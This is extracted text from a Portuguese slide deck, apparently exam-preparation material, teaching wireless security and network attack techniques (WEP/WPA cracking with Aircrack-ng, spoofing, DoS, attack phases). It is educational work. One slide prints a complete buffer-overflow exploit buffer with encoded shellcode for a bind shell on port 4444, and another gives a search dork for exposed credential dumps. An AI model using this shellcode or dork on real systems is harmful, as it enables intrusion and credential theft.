![Page 73: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/73.jpg)
Segurança em redes sem fio
Importante lembrar que uma rede sem fio funciona como um HUB.
Todos os AP de uma rede recebem todos os pacotes da rede
Mesmo os AP que não fazem parte da rede ainda podem receber os pacotes, pois os mesmo trafégam “over the air”, sem controle
Caso a rede possua uma senha estes pacotes estarão criptografados. Dependendo do algorítmo de criptografia as informações poderão ser acessadas em 10 minutos ou alguns anos...
![Page 74: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/74.jpg)
Segurança em redes sem fio
EAP - Extensible Authentication Protocol
Padrão IEEE (RFC 5247)
Permite multiplos meios de autenticação, como certificados, tokens, kerberos ...
LEAP - Lightweight EAP - Versão proprietária da Cisco deste protocolo
![Page 75: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/75.jpg)
Segurança em redes sem fioWEP (Wired Equivalency Protocol)
Padrão original de criptografia para redes sem fio
Facilmente quebrável (não segura)
Utiliza vetores de inicialização (IV) de 24-bits, que compõem uma cifra RC-4 para confidecialidade das comunicações.
Cada IV no WEP possui 24 bits, facilitando o processo de “quebra”
![Page 76: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/76.jpg)
Segurança em redes sem fioWEP (cont.)
Usa CRC32 para integridade, que é insuficiente para garantir a integridade criptográfica do pacote.
Como cada IV tem 24 bits seria possível prever todos os IV em um AP, transmitindo pacotes de 1500 bytes a 11 Mb/s em 5 horas
Com um grande número de IV coletados é possível descobrir a chave secreta da rede
Por ser baseado em senhas pode ser alvo de ataques de dicionário
Mensagens de associação e disassociação de um host na rede não são autenticados, permitindo que derrubemos alguém da rede mesmo sem estar na rede
![Page 77: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/77.jpg)
Segurança em redes sem fioWPA (Wi-fi protected Access)
Evolução do WEP, que resolve alguns dos problemas mais críticos deste.
IV’s de 48 bits ao invés de 24 bits
Uso mais raro de chaves compartilhadas e implementação de chaves temporárias para cifragem de pacotes (protoco TKIP - Temporal Key Integrity Protocol)
É possível injetar pacotes na rede para causar um Denial Of Service (DoS)
Suceptível a ataques de dicionário
![Page 78: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/78.jpg)
Segurança em redes sem fio
Wi-fi Protected Access 2 (WPA2)
Atualmente o mais seguro dos mecanismos de criptografia e autenticação para redes sem fio
Basicamente é suceptível apenas a ataques de dicionário, que podem ser demorar muito tempo para completar
![Page 79: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/79.jpg)
Segurança em redes sem fio
![Page 80: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/80.jpg)
Segurança em redes sem fioAtaques ao controle de acesso
War Driving
Rogue Access Points
Mac Spoofing
Associações AD Hoc
AP mal configurados
Clients mal configurados
Associação não-autorizada
Promiscuous client
![Page 81: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/81.jpg)
Segurança em redes sem fio
Ataques à integridade
Injeção de quadro de dados
WEP Injection
Data Replay
Initialization Vector Replay Attacks
![Page 82: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/82.jpg)
Segurança em redes sem fioAtaques à confidencialidade
Honeypot Access Point
Traffic Analysis
Evil Twin AP
Man-in-the-middle (MITM)
Quebra de chave WEP
![Page 83: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/83.jpg)
Segurança em redes sem fioAtaques à disponibilidade
Roubo de AP
DoS
Beacon Flood
Autenticate Flood
Disassociation Flood
De-Authenticate Flood
![Page 84: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/84.jpg)
Segurança em redes sem fioRogue access point attack
![Page 85: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/85.jpg)
Segurança em redes sem fioClient Mis-association
![Page 86: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/86.jpg)
Segurança em redes sem fioUnauthorized Association
![Page 87: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/87.jpg)
Segurança em redes sem fioHoneyspot Access Point Attack
![Page 88: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/88.jpg)
Segurança em redes sem fio
![Page 89: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/89.jpg)
Segurança em redes sem fioDenial of Service attack
![Page 90: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/90.jpg)
Segurança em redes sem fioEntendendo um pacote 802.11
![Page 91: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/91.jpg)
Segurança em redes sem fioPacote 802.11
Protocol Version - Indica a versão do do protocolo 802.11 usado. Valor atualmente é 0
Type e SubType - Determina a função do frame, podendo ser :
Control - Valor 1
Dados - Valor 2
Gerenciamento - Valor 0
To DS e From DS - Indica se o frame está vindo ou indo para o DS (Distribution System ou, na terminologia de rede sem fio, rede cabeada (Ethernet))
More fragments - Indica se há mais fragmentos nos frams que seguirão este
Retry - Indica se o frame está sendo retransmitido
![Page 92: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/92.jpg)
Segurança em redes sem fioPacote 802.11 (cont.)
Power Management - Indica se o STA está em modo ativo (valor 0) ou em power-save (valor 1)
More Data - Indica para o STA, em power save mode, que o AP tem mais quadros para enviar.
WEP - Indica se há, ou não, criptografia no quadro analisado
Order - Indica ser o pacote está sendo enviado usando uma classe de serviço estritamente ordenada. Não utilizada atualmente.
![Page 93: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/93.jpg)
Segurança em redes sem fio
Pacote 802.11 (cont.)
Sequence Control
Sequence number (12 bits) - Indica a o número de sequencia de cada quadro. Varia de 0-4095
Fragment Number (4 bits) - Indica o número de cada fragmento de um quadro enviado.
![Page 94: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/94.jpg)
Segurança em redes sem fioPacote 802.11 (Cont.)
Data
Pode ter até 2324 bytes de dados.
O MSDU (Mac Service Data Unit) no padrão IEEE 802.11 é 2304 Bytes.
Há algum overhead quando usa-se criptografia:
WEP: 8 bytes -> 2312 Bytes total
TKIP (WPA1): 20 Bytes -> 2324 Bytes total
CCMP(WPA2): 16 Bytes -> 2320 Bytes total
![Page 95: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/95.jpg)
Segurança em redes sem fioAtacando uma rede sem fio
Primeiramente é necessário ter uma placa de rede com um driver que permita a placa entrar no chamado “modo promíscuo”, semelhante ao que acontece com o uso de sniffers em redes cabeadas
Contudo nem todas as placas possuem um driver com esta função, pois não é comum o fabricante da placa de rede “bloquear” esta função em seus drivers originais
Contudo é possível encontrar uma uma relação de placas com drivers que suportam o modo promíscuo no link http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy
![Page 96: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/96.jpg)
Segurança em redes sem fio
Para fazer os ataques existe um framework conhecido chamado Aircrack-NG
Este software está instalado, por padrão, na distribuição Linux para testes de invasão “Backtrack” e “Kali Linux”
Existem versões para Windows, mas é mais comumente usada em Linux
![Page 97: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/97.jpg)
Segurança em redes sem fio
Ferramentas do Aircrack-NG
Airmon-ng
Utilizado para habilitar o modo monitor(promíscuo) nas interfaces de rede sem fio
Sintaxe: airmon-ng <start|stop> interface [channel]
![Page 98: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/98.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Ferramenta utilizada para capturar dados brutos 802.11 e, particularmente, coletar IV’s WEP para uso posterior com o Aircrack-NG
Se houver um receptor de GPS plugado e compatível o Airdump-NG poderá mostrar as coordenadas geográficas dos AP ou clientes encontrados
![Page 99: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/99.jpg)
Segurança em redes sem fio
Ferramentas Aircrack-NG (cont.)
Exemplo de saída do Airdump-NG CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear00:14:6C:7E:40:80 32 100 752 73 2 9 54 WPA TKIP PSK teddy
BSSID STATION PWR Lost Packets Probes00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 500:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 99 teddy
![Page 100: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/100.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Informações importantes
BSSID - Endereço MAC do AP
PWR - Nível de sinal reportado pela placa de rede. Quanto mais alto, mais próximo do AP ou da estação. Se o BSSID PWR é -1 então o driver não suporta report de nível de sinal. Se PWR é -1 para um número restrito de estações então este pacote veio do AP mas está indo para uma estação que está fora do alcance de nossa placa de rede. Se todos os clientes tiverem PWR -1 então o driver não suporta report de nível de sinal.
![Page 101: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/101.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Informações importantes
RXQ - Qualidade de recepção, que é medido pela porcentagem de pacotes (de gerenciamento e dados) que foram recebidos com sucesso nos últimos 10 segundos
BEACONS - Número de pacotes de anúncios enviados pelo AP. Cada AP envia em torno de 10 beacons por segundo.
#Data - Número de pacotes de dados capturados (se WEP, aponta o número de IV não repetidos), incluindo pacotes de broadcast
#/s - Número de pacotes de dados por segundo, medidos nos últimos 10 segundos.
CH - Número do canal (obtido dos pacotes de anúncio)
![Page 102: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/102.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Informações importantes
MB - Velocidade máxima suportada pelo AP. Se MB=11 então 802.11b, se MB = 22 então 802.11b +. E taxas mais altas de 802.11g
ENC - Algoritimo de criptografia em uso. OPN= Sem criptografia. WEP?= WEP ou superior (indefinido), WEP=WEP, WPA=WPA, WPA2=WPA2
CIPHER - Cifra detectada (CCMP, WRAP, TKIP, WEP, WEP40 ou WEP104)
AUTH - Tipo de autenticação (MGT=servidor de autenticação externo, SKA=Chave compartilhada para WEP, PSK=Chave compartilhada para WPA/WPA2 ou OPN=Aberta para WEP)
![Page 103: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/103.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Informações importantes
ESSID - Mostra o SSID. Se vazio o Airdump-NG tentará obter esta informação dos pacotes capturados
STATION - Endereço MAC das estações detectadas
LOST -Número dos pacotes perdidos nos últimos 10 segundos, baseado no número de sequencia.
PACKETS - Número de pacotes de dados enviados pelo cliente
PROBES - O SSID procurado pelo cliente
![Page 104: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/104.jpg)
Segurança em redes sem fio
Ferramentas do Aircrack-NG
Aireplay-NG
Usado para gerar ou acelerar o tráfego para uso posterior com o Aircrack-NG
Suporta diversos tipos de ataques
![Page 105: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/105.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques suportados
Ataque 0 - Deauthentication
Ataque 1 - Fake authentication
Ataque 2 - Interactive packet replay
Ataque 3 - ARP request replay attack
Ataque 4 - KoreK chopchop attack
Ataque 5 - Fragmentation attack
Ataque 9 - Injection test
![Page 106: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/106.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
De-athentication attack
Ataque número “0” do Aireplay
Força um cliente específico (ou todos, se não informarmos o MAC de um cliente) a se desconectar de uma rede sem fio e fazer nova autenticação.
![Page 107: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/107.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
Fake Authentication
Permite que vc faça dois tipos de autenticação WEP (Open system e chave compartilhada) e faça uma associação a um AP.
Este ataque é útil quando não há clientes associados a rede.
![Page 108: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/108.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
Interactive Packet Replay
Permite que um pacote seja re-inserido na rede (replayed), podendo gerar efeitos vantajosos ao atacante (como o aumento de vetores de inicialização)
![Page 109: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/109.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
ARP Request Replay
Semelhante ao Packet Replay, mas focado em ARP request.
Também possui foco em aumentar a geração de initialization vectors
![Page 110: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/110.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
Korek ChoChop Attack
Permite decifrar dados de uma rede WEP sem conhecer a chave
Não dá acesso a chave em si
Alguns AP não são vulneráveis ao ataque
![Page 111: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/111.jpg)
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
Fragmentation Attack
Utilizado para obter o PRGA (Pseudo Random Generation Algorithm) dos pacotes
PRGA pode ser usado pelo packetforge-NG para gerar pacotes forjados dentro de uma rede sem fio
![Page 112: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/112.jpg)
Segurança em redes sem fio
Ferramentas do Aircrack-NG
Aircrack-NG
Ferramenta para quebra de chaves WEP e WPA/PSK
![Page 113: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/113.jpg)
Ataques em redes de computadores
Metodologia de ataque
Todo ataque é dividido em fases e estas não possuem um prazo exato para terminar. Podem durar alguns meses até anos, dependendo do alvo.
As fases são Reconhecimento, Obtendo acesso, mantendo acesso e limpando os traços.
![Page 114: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/114.jpg)
Ataques em redes de computadores
Obtendo acesso
Nesta fase são exploradas as vulnerabilidades e fraquezas encontradas na fase anterior, visando obter acesso ao alvo
Uso de exploits contra servidores vulneráveis, uso de informações encontradas no google para invadir um servidor Web, engenharia social contra alvos pré-selecionados, dentre outras atividades.
![Page 115: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/115.jpg)
Ataques em redes de computadores
Mantendo acesso
Após obter acesso desejamos manter este acesso, em caso do administrador descobrir a vulnerabilidade e remover esta.
Nesta fase são instalados backdoors, rootkits e qualquer código que permita um acesso posterior.
![Page 116: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/116.jpg)
Ataques em redes de computadores
Limpando os traços
Nesta fase elimina-se, dentro do possível, os traços da presença do hacker no sistema invadido.
Logs comumente são apagados, códigos inseridos são ocultados, dentre outras tarefas.
![Page 117: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/117.jpg)
Ataques em redes de computadores
Atividades
Google Hacking
Técnica que utiliza o Google para localizar servidores WEB vulneráveis ou até mesmo com backdoors ativos
Muito utilizado por hackers
Exemplo: Ao fazer uma pesquisa por allinurl:auth_user_file.txt no google encontramos uma lista de URLs com dump de MYSql server na internet, com livre acesso. Nesses dumps podemos encontrar credenciais de acesso que ainda podem ser válidas.
Para esta função o Google dispõe de diversos operadores que auxiliam na tarefa.
![Page 118: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/118.jpg)
Ataques em redes de computadores
Tipos
![Page 119: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/119.jpg)
Ataques em redes de computadores
Ataques
ARP Spoofing
Enganar o mapemento entre o endereço MAC e o enderereço IP feito pelo protocolo ARP (Address Resolution Protocol).
Endereço IP de 32 bits
Endereço Ethernet de 48 bits
![Page 120: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/120.jpg)
Ataques em redes de computadores
Ataques
ARP Spoofing (cont.)
Deste ataque deriva uma técnica que permite fazer sniffing em uma rede com switches, mesmo sem o uso de portas de monitoramento=
![Page 121: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/121.jpg)
Ataques em redes de computadores
Ataques
ARP Spoofing : Ferramenta
EtterCap
Mutito utilizada para fazer ataques ARP Spoofing e seus derivantes.
![Page 122: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/122.jpg)
Ataques em redes de computadores
Ataques
DNS Spoofing
Ataque derivante do ARP Spoofing
Tem como objetivo desviar todas as solicitações de DNS que iriam para a internet para um DNS server controlado pelo hacker.
Com este controle é possível fazer o usuário abrir páginas com códigos maliciosos, fazendo que estas passem para o controle do atacante
A ferramenta Ettercap também é utilizada para este ataque
![Page 123: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/123.jpg)
Ataques em redes de computadores
IP Spoofing
Falsificação de endereço IP de origem;
Não é possível obter respostas – vai para o endereço forjado;
Muito usado em ataques de negação de serviço (Denial-of-Service, DoS);
Egress Filtering para prevenção (anti-spoofing).
![Page 124: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/124.jpg)
Ataques em redes de computadores
Fragmentação de pacotes IP
Característica do próprio protocolo;
MTU (Maximum Transfer Unit) – Ethernet é 1500, FDDI é 4470;
Fragmentação e reagrupamento (desfragmentação);
Uso de offsets para o reagrupamento.
![Page 125: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/125.jpg)
Ataques em redes de computadores
Fragmentação de pacotes IP (cont.)
Ping of Death;
Teadrop;
Land;
Overlapping Fragment Attack.
![Page 126: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/126.jpg)
Ataques em redes de computadores
Denial of Service
Afeta a disponibilidade da informação;
Explora recursos de uma forma agressiva, estressando-os e impedindo-os de realizar suas tarefas básicas;
Usuários legítimos ficam impedidos de acessar o recurso;
Pode “derrubar” um servidor, encher um link, estourar a memória ou explorar uma vulnerabilidade.
![Page 127: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/127.jpg)
Ataques em redes de computadores
SYN FloodingCliente Servidor
SYN seq= x
SYN seq= y, ACK x + 1
ACK y + 1
Conexão estabelecida
Vários pacotes SYN
Fila das conexõesdo servidor cheia
SYN flooding
![Page 128: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/128.jpg)
Ataques em redes de computadores
Smurf e Fraggle
Pacote PING (ICMP echo) para o endereço broadcast da rede, usando IP Spoofing;
Todos os hosts da rede respondem ao PING para o host que teve o seu endereço falsificado (IP Spoofing);
Duas vítimas: a rede, que fica congestionada, e o host que teve o seu endereço falsificado.
Fraggle usa UDP ao invés de ICMP.
![Page 129: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/129.jpg)
Ataques em redes de computadores
Session Hijacking (Sequestro de sessões)
Man-in-the-Middle ou Session Hijacking;
Explora o prognóstico do número de seqüência (sequence number prediction) do three-way handshake;
O atacante fica entre o cliente e o servidor, podendo assim alterar toda a comunicação entre eles;
O atacante envia informações infiltrando-se nas conexões, baseado na descoberta do número de seqüência dessas conexões.
![Page 130: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/130.jpg)
Ataques em redes de computadores
Ataques coordenados
Ataque de negação de serviço distribuído, ou Distributed Denial-of-Service (DDoS);
Dificuldade de descobrir a origem dos ataques: milhares de origens do ataque;
Botnets - Redes de zumbis (bots) que atendem a comandos de uma central de comando e controle (C2), realizando ataques contra alvos determinados pelos seus mestres
Todos os zumbis e os alvos de seus ataques são vítimas.
![Page 131: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/131.jpg)
Ataques em redes de computadores
Buffer Overflow
Exploração de uma falha na aplicação, onde uma variável do programa pode expor outras áreas da memória ao hacker, permitindo sua manipulação, mesmo remota, com o carregamento de códigos maliciosos.
Muitas técnicas auxiliam na descobertas destas vulnerabilidades, tornando-se cada vez mais comuns
![Page 132: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/132.jpg)
Ataques em redes de computadores#buffer = "A" * 2000buffer="\x41"*969
buffer+="\xed\x1e\x94\x7c"#buffer+="\7c" + "\94" + "\1E" + "\ED"
#buffer+="\x42" * 4buffer+="\x43" * 16buffer+="\x90" * 16
buffer+=("\xb8\x52\x1c\x20\xa1\xd9\xe1\xd9\x74\x24\xf4\x5a\x33\xc9\xb1""\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x5d\xfe\xd5\x5d\x89\x77""\x15\x9e\x49\xe8\x9f\x7b\x78\x3a\xfb\x08\x28\x8a\x8f\x5d\xc0""\x61\xdd\x75\x53\x07\xca\x7a\xd4\xa2\x2c\xb4\xe5\x02\xf1\x1a""\x25\x04\x8d\x60\x79\xe6\xac\xaa\x8c\xe7\xe9\xd7\x7e\xb5\xa2""\x9c\x2c\x2a\xc6\xe1\xec\x4b\x08\x6e\x4c\x34\x2d\xb1\x38\x8e""\x2c\xe2\x90\x85\x67\x1a\x9b\xc2\x57\x1b\x48\x11\xab\x52\xe5""\xe2\x5f\x65\x2f\x3b\x9f\x57\x0f\x90\x9e\x57\x82\xe8\xe7\x50""\x7c\x9f\x13\xa3\x01\x98\xe7\xd9\xdd\x2d\xfa\x7a\x96\x96\xde""\x7b\x7b\x40\x94\x70\x30\x06\xf2\x94\xc7\xcb\x88\xa1\x4c\xea""\x5e\x20\x16\xc9\x7a\x68\xcd\x70\xda\xd4\xa0\x8d\x3c\xb0\x1d""\x28\x36\x53\x4a\x4a\x15\x3c\xbf\x61\xa6\xbc\xd7\xf2\xd5\x8e""\x78\xa9\x71\xa3\xf1\x77\x85\xc4\x28\xcf\x19\x3b\xd2\x30\x33""\xf8\x86\x60\x2b\x29\xa6\xea\xab\xd6\x73\xbc\xfb\x78\x2b\x7d""\xac\x38\x9b\x15\xa6\xb6\xc4\x06\xc9\x1c\x73\x01\x07\x44\xd0""\xe6\x6a\x7a\xc7\xaa\xe3\x9c\x8d\x42\xa2\x37\x39\xa1\x91\x8f""\xde\xda\xf3\xa3\x77\x4d\x4b\xaa\x4f\x72\x4c\xf8\xfc\xdf\xe4"
"\x6b\x76\x0c\x31\x8d\x89\x19\x11\xc4\xb2\xca\xeb\xb8\x71\x6a""\xeb\x90\xe1\x0f\x7e\x7f\xf1\x46\x63\x28\xa6\x0f\x55\x21\x22""\xa2\xcc\x9b\x50\x3f\x88\xe4\xd0\xe4\x69\xea\xd9\x69\xd5\xc8""\xc9\xb7\xd6\x54\xbd\x67\x81\x02\x6b\xce\x7b\xe5\xc5\x98\xd0""\xaf\x81\x5d\x1b\x70\xd7\x61\x76\x06\x37\xd3\x2f\x5f\x48\xdc"
"\xa7\x57\x31\x00\x58\x97\xe8\x80\x66\x69\x20\x1d\xfe\xd0\xd1""\x5c\x62\xe3\x0c\xa2\x9b\x60\xa4\x5b\x58\x78\xcd\x5e\x24\x3e"
"\x3e\x13\x35\xab\x40\x80\x36\xfe")buffer+="\xCC" * 630
Acionamento da vulnerabilidade
Código malicioso que criará uma porta adicional (4444/TCP) e dará acesso remoto ao
shell do computador
![Page 133: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/133.jpg)
Ataques em redes de computadoresTipos de shell
Normalmente um ataque buffer overflow é usado para obter um shell no sistema alvo
Existem dois tipos básicos
Direct shell - Uma porta é aberta no sistema alvo e é associada a um shell do sistema operacional
Reverse shell - O código malicioso que foi executado no alvo estabelece uma conexão com o computador do atacante e transmite, através desta conexão, o acesso ao shell no sistema alvo
Conseguimos criar um shell (reverso ou direto) com algumas ferramentas, como o Netcat (comando nc no Linux) que permite algumas outras atividades ou com o Meterpreter, parte integrante do Metasploit, que é capaz de entregar ao atacante um shell avançado, com algumas funções para simplificar a coleta de informações no servidor alvo.
![Page 134: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/134.jpg)
Ataques em redes de computadores
Shell reverso e tunneling
Uma das grandes vantagens do shell reverso é a possibilidade de bypass o firewall local, pois não há necessidade em abrir uma porta no alvo. O alvo se comunica com o atacante
Contudo, pela existência de um firewall, pode ser impossível um ataque a determinada porta que tenhamos descoberto haver outra vulnerabilidade a ser explorada.
Nestes cenários podemos aplicar uma técnica chamada tunneling, onde usamos um cliente de SSH no alvo que já obtivemos acesso para redirecionar o tráfego a uma outra porta local (por exemplo 3389/TCP - Remote desktop no Windows) atráves de um túnel cifrado pelo SSH
![Page 135: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/135.jpg)
Ataques em redes de computadores
![Page 136: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/136.jpg)
Ataques em redes de computadores
Escaneamento
Atividade realizada para descobrir portas e serviços nos hosts alvo
Se feito corretamente pode passar desapercebido para o administrador da rede
Contudo, sem os devidos cuidados pode aparecer imediatamente nas telas de IDS/IPS da rede
![Page 137: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/137.jpg)
Ataques em redes de computadores
Three-way handshake do TCP
Three-way handshake do TCP:
O cliente envia uma requisição de conexão – pacote SYN;
O servidor recebe o pacote SYN e responde com uma resposta de reconhecimento (acknowledgement) – pacote SYN-ACK;
O cliente reconhece o pacote SYN-ACK – pacote ACK;
A conexão é estabelecida (three-way handshake);
A troca de dados acontece;
A conexão é encerrada com um pacote com flag FIN;
A conexão é encerrada de forma anormal com pacote RST.
![Page 138: Pf Perito Criminal](https://reader036.vdocuments.pub/reader036/viewer/2022081723/55cf9726550346d0338ff6b5/html5/thumbnails/138.jpg)
Ataques em redes de computadores
